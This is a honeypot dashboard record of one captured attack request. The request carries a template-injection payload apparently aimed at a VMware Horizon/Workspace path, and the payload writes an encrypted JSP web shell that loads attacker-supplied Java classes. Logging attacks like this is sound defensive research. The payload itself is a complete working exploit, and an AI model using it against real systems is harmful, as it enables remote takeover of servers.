Dashboard
IP Addresses

Attribution & Reputation
SSH Honeypots

Attackers

Commands

Proxy Requests

Malware Drops
HTTP Honeypots

Attackers
Elasticsearch Honeypots

Attackers
FTP Honeypots

Attackers
Attack f7ef4c00-9c8b-461a-93e5-a586c36229c5

Details

ID	f7ef4c00-9c8b-461a-93e5-a586c36229c5
Attack Type	elasticsearch
IP Address	75.127.11.24
Username
Password
Client Version	Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.54 Safari/537.36 Edg/95.0.1020.40
Country	United States
Date	2023-06-04 08:48PM
Request Data

{
   "path": "",
   "method": "GET",
   "headers": {
     "Accept": "*/*",
     "Connection": "keep-alive",
     "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.54 Safari/537.36 Edg/95.0.1020.40",
     "Accept-Encoding": "gzip, deflate"
   },
   "hostname": "localhost",
   "form_data": {
     "deviceUdid": "${\"freemarker.template.utility.ObjectConstructor\"?new()(\"java.io.FileOutputStream\",\"/opt/vmware/horizon/workspace/webapps/SAAS/jersey/manager/api/images/2907/4Mnciua.jsp\").write(\"freemarker.template.utility.ObjectConstructor\"?new()(\"java.lang.String\",\"%252525250A%2525252B%2525252B%2525252B%2525252B%2525252B%2525252B%2525252B%2525252B%252525253C%2525252525%2525252540page%2525252Bimport%252525253D%252525255C%2525252522java.util.%252525252A%252525252Cjavax.crypto.%252525252A%252525252Cjavax.crypto.spec.%252525252A%252525255C%2525252522%2525252525%252525253E%252525250A%2525252B%2525252B%2525252B%2525252B%2525252B%2525252B%2525252B%2525252B%2525252B%2525252B%2525252B%2525252B%2525252B%2525252B%2525252B%2525252B%252525253C%2525252525%2525252521%252525250A%2525252B%2525252B%2525252B%2525252B%2525252B%2525252B%2525252B%2525252B%2525252B%2525252B%2525252B%2525252B%2525252B%2525252B%2525252B%2525252B%2525252B%2525252Bclass%2525252BU%2525252Bextends%2525252BClassLoader%252525257B%252525250A%2525252B%2525252B%2525252B%2525252B%2525252B%2525252B%2525252B%2525252B%2525252B%2525252B%2525252B%2525252B%2525252B%2525252B%2525252B%2525252B%2525252B%2525252B%2525252B%2525252B%2525252B%2525252BU%2525252528ClassLoader%2525252Bc%2525252529%2525252B%252525257B%252525250A%2525252B%2525252B%2525252B%2525252B%2525252B%2525252B%2525252B%2525252B%2525252B%2525252B%2525252B%2525252B%2525252B%2525252B%2525252B%2525252B%2525252B%2525252B%2525252B%2525252B%2525252B%2525252Bsuper%2525252528c%2525252529%252525253B%252525250A%2525252B%2525252B%2525252B%2525252B%2525252B%2525252B%2525252B%2525252B%2525252B%2525252B%2525252B%2525252B%2525252B%2525252B%2525252B%2525252B%2525252B%2525252B%2525252B%2525252B%2525252B%2525252B%252525257D%252525250A%2525252B%2525252B%2525252B%2525252B%2525252B%2525252B%2525252B%2525252B%2525252B%2525252B%2525252B%2525252B%2525252B%2525252B%2525252B%2525252B%252525250A%2525252B%2525252B%2525252B%2525252B%2525252B%2525252B%2525252B%2525252B%2525252B%2525252B%2525252B%2525252B%2525252B%2525252B%2525252B%2525252B%2525252B%2525252B%2525252B%2525252B%2525252B%2525252Bpublic%2525252BClass%2525252Bg%2525252528byte%2525252B%252525255B%252525255Db%2525252529%2525252B%252525257B%252525250A%2525252B%2525252B%2525252B%2525252B%2525252B%2525252B%2525252B%2525252B%2525252B%2525252B%2525252B%2525252B%2525252B%2525252B%2525252B%2525252B%2525252B%2525252B%2525252B%2525252B%2525252B%2525252B%2525252B%2525252Breturn%2525252Bsuper.defineClass%2525252528b%252525252C0%252525252Cb.length%2525252529%252525253B%252525250A%2525252B%2525252B%2525252B%2525252B%2525252B%2525252B%2525252B%2525252B%2525252B%2525252B%2525252B%2525252B%2525252B%2525252B%2525252B%2525252B%2525252B%2525252B%2525252B%2525252B%2525252B%2525252B%252525257D%252525250A%2525252B%2525252B%2525252B%2525252B%2525252B%2525252B%2525252B%2525252B%2525252B%2525252B%2525252B%2525252B%2525252B%2525252B%2525252B%2525252B%252525257D%2525252525%252525253E%252525253C%2525252525%252525250A%2525252B%2525252B%2525252B%2525252B%2525252B%2525252B%2525252B%2525252B%2525252B%2525252B%2525252B%2525252B%2525252B%2525252B%2525252B%2525252B%2525252B%2525252Bif%2525252B%2525252528request.getMethod%2525252528%2525252529.equals%2525252528%252525255C%2525252522POST%252525255C%2525252522%2525252529%2525252529%252525257B%252525250A%2525252B%2525252B%2525252B%2525252B%2525252B%2525252B%2525252B%2525252B%2525252B%2525252B%2525252B%2525252B%2525252B%2525252B%2525252B%2525252B%2525252B%2525252B%2525252B%2525252B%2525252B%2525252B%2525252BString%2525252Bk%252525253D%252525255C%2525252522e45e329feb5d925b%252525255C%2525252522%252525253B%252525250A%2525252B%2525252B%2525252B%2525252B%2525252B%2525252B%2525252B%2525252B%2525252B%2525252B%2525252B%2525252B%2525252B%2525252B%2525252B%2525252B%2525252B%2525252B%2525252B%2525252B%2525252B%2525252B%2525252Bsession.putValue%2525252528%252525255C%2525252522u%252525255C%2525252522%252525252Ck%2525252529%252525253B%252525250A%2525252B%2525252B%2525252B%2525252B%2525252B%2525252B%2525252B%2525252B%2525252B%2525252B%2525252B%2525252B%2525252B%2525252B%2525252B%2525252B%2525252B%2525252B%2525252B%2525252B%2525252B%2525252B%2525252BCipher%2525252Bc%252525253DCipher.getInstance%2525252528%252525255C%2525252522AES%252525255C%2525252522%2525252529%252525253B%252525250A%2525252B%2525252B%2525252B%2525252B%2525252B%2525252B%2525252B%2525252B%2525252B%2525252B%2525252B%2525252B%2525252B%2525252B%2525252B%2525252B%2525252B%2525252B%2525252B%2525252B%2525252B%2525252B%2525252Bc.init%25252525282%252525252Cnew%2525252BSecretKeySpec%2525252528k.getBytes%2525252528%2525252529%252525252C%252525255C%2525252522AES%252525255C%2525252522%2525252529%2525252529%252525253B%252525250A%2525252B%2525252B%2525252B%2525252B%2525252B%2525252B%2525252B%2525252B%2525252B%2525252B%2525252B%2525252B%2525252B%2525252B%2525252B%2525252B%2525252B%2525252B%2525252B%2525252B%2525252B%2525252B%2525252Bnew%2525252BU%2525252528this.getClass%2525252528%2525252529.getClassLoader%2525252528%2525252529%2525252529.g%2525252528c.doFinal%2525252528new%2525252Bsun.misc.BASE64Decoder%2525252528%2525252529.decodeBuffer%2525252528request.getReader%2525252528%2525252529.readLine%2525252528%2525252529%2525252529%2525252529%2525252529.newInstance%2525252528%2525252529.equals%2525252528pageContext%2525252529%252525253B%252525257D%252525250A%2525252B%2525252B%2525252B%2525252B%2525252B%2525252B%2525252B%2525252B%2525252B%2525252B%2525252B%2525252B%2525252B%2525252B%2525252B%2525252B%2525252525%252525253E%252525250A%2525252B%2525252B%2525252B%2525252B%2525252B%2525252B%2525252B%2525252B%2525252B%2525252B%2525252B%2525252B%2525252B%2525252B%2525252B%2525252B%252525253C%2525252525out.println%2525252528%252525255C%2525252522e8418d1d706cd73548f9f16f1d55ad6e%252525255C%2525252522%2525252529%2525252B%252525253B%2525252525%252525253E\").getBytes())}"
   }
 }